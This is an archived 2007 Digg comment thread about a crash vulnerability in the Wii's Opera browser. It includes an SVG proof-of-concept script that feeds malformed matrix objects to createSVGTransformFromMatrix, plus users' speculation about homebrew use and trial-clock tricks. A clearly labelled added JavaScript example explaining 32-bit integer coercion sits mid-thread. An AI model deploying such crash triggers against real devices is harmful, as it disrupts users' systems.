42 Comments
- lbradeen, on 10/12/2007, -0/+17 I'm hosting this from home, so in case it goes down, the relevant code used is this.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg id="mySVG" width="100%" height="100%" version="1.1"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:1;
stroke:rgb(0,0,0)"/>
<script>
var svg = document.getElementById("mySVG");
var matrix = svg.createSVGMatrix();
var i=0xffffffff, randomObject = {a:i,b:i,c:i,d:i,e:i,f:i};
try{
svg.createSVGTransformFromMatrix(matrix);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(randomObject);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(null);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(i);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(new Array(i));
}catch(e){}
</script>
</svg>
- Guard, on 10/12/2007, -1/+15 "Don't update your Wii's any time soon!!!"
Doesn't matter if you update your Wii. Wii Browser is a download from the Wii Shop and is not part of any system update.
- unloud, on 10/12/2007, -1/+14 It's all text; I'm sure he'll be fine.
- saunderez, on 10/12/2007, -0/+13 If I knew how the hell this worked I'd so be trying some code injection right now...
- Protoss, on 10/12/2007, -0/+12 Well right now, I think everyone is just hoping for a Hello World :P
- barktwiggs, on 10/12/2007, -0/+10 Opera has already patched this vulnerability with its 9.10 version. All they need to do is port it to the Wii and it's fixed, whenever that will be. Let's see what type of sploitz happen in the meantime though.
- Protoss, on 10/12/2007, -0/+10 Looks like a hopeful start to Wii homebrew apps, or at least a way to run code.
- dralezero, on 10/12/2007, -0/+9 Was wondering what he meant by that.
- seanthebond, on 10/12/2007, -2/+11 I can guarantee that if you're hosting this from home, and this gets on the front page, it's going down.
- lemur33, on 10/12/2007, -0/+9 omy god that is fantabulous
- larholm, on 10/12/2007, -1/+9 I created the above proof-of-concept code for lbradeen in an IRC session, #Javascript on EfNet. It's very loosely based on the iDefense advisory, which mentions that an improper matrix object allows you to manipulate the virtual function pointers.
Just leaving a comment so that lbradeen has my contact ;)
Regards
Thor Larholm
- ascott9, on 10/12/2007, -0/+7 It's on the front page and going strong right now. It actually loaded faster than almost any site ever loads from the Digg homepage. Just text or not, he must have a good connection.
- timelf123, on 10/12/2007, -2/+6 nice find!
- lhnz, on 10/12/2007, -0/+3 It's like a thread that you can pull and the rest will unravel.
- Araya213, on 10/12/2007, -0/+3 Hopefully by then we'll all have custom firmware in our Wiis.
- TheTjalian, on 10/12/2007, -0/+2 This'll be more for homebrewers than actual hackers, which is good. I can't wait to see hello world ported :)
- DonkeyBeliever, on 10/12/2007, -0/+2 Just tested it on my Wii, it works great, had to do a hard reset though :P
- FaT32, on 10/12/2007, -1/+3 BTW, Opera for Wii is still beta software. So, they probably will patch it...
Don't worry about Opera's security, the guys care a lot about it.
- FreePlayPSP, on 10/12/2007, -0/+2 I'm not sure how much is known about the Wii's architecture, so I'm not sure how viable it will be to run our own unsigned code through this. Not to mention that Opera seems to run in a sort of sandbox - I've Lastmeasured my Wii to the point that the browser was 100% unresponsive but the Home button still worked just fine. Haven't tested this out yet, though, so it's possible that this 'breaks' the sandbox.
Nice PoC, lbradeen and larholm. Question, though: is this an actual overflow, or just an out-of-memory glitch from trying to create an array with 0xFFFFFFFF members? I don't know much about how Opera handles memory in its Javascript handler, or whether 0xFFFFFFFF means -1 or 4294967295 for Javascript in general. I assume that shoving this function into createSVGTransformFromMatrix simply bypasses some sort of memory limitation check. Is this really usable to run unsigned code, or just to crash the system?
- Onikun, on 10/12/2007, -0/+2 Just keep setting your clock back on your Wii and the trial might not expire?
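An added example, not part of the thread and not lbradeen's or larholm's code, answering the JavaScript half of FreePlayPSP's question above: what 0xFFFFFFFF means to the language, how it looks once coerced to a 32-bit integer, and whether new Array(0xffffffff) is an out-of-memory condition. It says nothing about how Opera's native createSVGTransformFromMatrix handled its argument, which the thread does not establish.

```javascript
// Added example (not from the thread). JavaScript Numbers are IEEE-754
// doubles, so the literal 0xffffffff is simply 4294967295; there is no
// unsigned/signed ambiguity until a value is coerced to a 32-bit integer.
function literalValue() {
  return 0xffffffff; // 4294967295
}

// The spec's ToInt32 (used by the bitwise operators) wraps 2^32-1 to -1.
// Native bindings that read the argument as a signed int see it this way.
function toInt32(n) {
  return n | 0;
}

// ToUint32 (used by >>> and for array lengths) keeps 4294967295, and maps
// a negative -1 back onto 2^32-1. Both views are the same 32 bit pattern.
function toUint32(n) {
  return n >>> 0;
}

// Array lengths are Uint32 values, so 2^32-1 is the largest legal length
// and 2^32 throws RangeError before anything is allocated. Creating the
// array is not an out-of-memory event: it is sparse, holds only its length
// field, and no index exists until something is assigned to it.
function arrayProbe(len) {
  try {
    const a = new Array(len);
    return { ok: true, length: a.length, firstSlotExists: 0 in a };
  } catch (e) {
    return { ok: false, error: e.name };
  }
}

// Run stand-alone to see the three views of the same value side by side.
if (typeof require !== "undefined" && require.main === module) {
  console.log(literalValue(), toInt32(0xffffffff), toUint32(-1));
  console.log(arrayProbe(0xffffffff), arrayProbe(0x100000000));
}
```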
- DonkeyBeliever, on 10/12/2007, -0/+2 Also note that this Internet Channel "Trial" expires sometime this year, so even if we have a successful exploit we won't have it for long...
- mageofdeath, on 10/12/2007, -0/+2 We'll have the exploit as long as we want it, so long as we don't update anything, and in case you think updates are necessary for playing new games, it just isn't the case anymore, as the PSP has demonstrated: a good exploit allowing unsigned code can have all kinds of workarounds...
- lhnz, on 10/12/2007, -0/+1 That's true. I guess the first use has to be getting it to disable the trial to give more time! haha :D
- mageofdeath, on 10/12/2007, -0/+1 Why not, some of the Vista and XP hacks worked this way, and who says they'll make it expire? From what I hear that's when the full version will be released, ie not an upgrade...
- dontlookdown, on 10/12/2007, -0/+1 So I don't really understand this. What does this do?
- mattcoxonline, on 10/12/2007, -0/+1 Also, the current version is a DEMO, or beta, if you will - and that's why people can acquire it for free.
The full version, no doubt, will fix bugs like this, and have a few extra features.
- LordSturm, on 10/12/2007, -0/+1 Giddy up FreePlay!
:P - Hopefully this leads to some enjoyment, and that enjoyment doesn't have an inevitable end in March.
- ramunas, on 10/12/2007, -0/+1 Yup, I wouldn't worry about this.
- wolkengrau, on 10/12/2007, -0/+1 Just put the Internet Channel on an SD card.
That works, too.
- moofree, on 10/12/2007, -0/+1 Yeah right. That's why there's no Gamecube homebrew.
And no software was ever coded for Macs when they were PPC. None.
- Shirokun, on 10/12/2007, -1/+1 Homebrew and stuff, if all goes well.
- Dood77, on 10/12/2007, -1/+1 So, I don't see how crashing a console will let you run unsigned code. Not that I think it's impossible, I've seen it done before; I just want to know how it works. Do you give it a command before/after the buffer overflow to read data from somewhere to execute or something?
- lbradeen, on 10/12/2007, -0/+0 I'll have to go through the Apache logs today to see how many pages it served, but I'm pretty impressed it stayed up. It's running on a Xen VM w/ 256MB RAM, 25% of which is being wasted by my mail server that's already on there.
- KungFuJesus, on 10/12/2007, -1/+1 Um, they would have to write shellcode for PPC, which crackers pretty much don't, 'cause RISC is a bitch and not many people have PPC.
- NOPx86, on 10/12/2007, -0/+0 YAYYYYYYYY FreePlay is here to HAXORZZ FTW!!!!!!!! :p
- bluraven64, on 10/12/2007, -4/+3 If it allows execution of unsigned code, it could lead to a lot of things.
- mageofdeath, on 10/12/2007, -4/+1 Here's to hoping for a good N64 emulator, or Wii or GC backups!!!
- pintong, on 10/12/2007, -5/+1 For the uninformed readers, this is *good news*
- theratdotus, on 10/12/2007, -8/+2 wat sploitz would be possible in theory? transferring media from net to sd? channel hacks? or just more porn?
- doshindude, on 10/12/2007, -12/+5 um.
yeah.
who cares.
- Simon80, on 10/12/2007, -9/+2 That would be very, very sad, and highly unlikely, I think.
- inactive, on 10/12/2007, -13/+1 What's it running? Win XP? Also, it doesn't affect Firefox.